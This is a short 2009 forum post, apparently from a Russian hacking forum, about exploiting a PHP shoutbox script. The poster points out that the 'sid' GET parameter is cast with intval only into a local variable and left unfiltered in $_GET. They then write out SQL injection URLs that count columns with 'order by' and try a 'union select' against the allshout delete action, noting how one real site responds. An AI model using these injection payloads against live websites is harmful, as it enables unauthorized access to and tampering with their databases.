
13.08.2009, 11:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
про sid
if (isset($_GET["sid"])) {
$sid = intval($_GET["sid"]); # getting shout id (sid)
но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]);
нету  не фильтрует
3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete =>
index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete
мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп 
Последний раз редактировалось HAXTA4OK; 13.08.2009 в 11:45..
|
|
|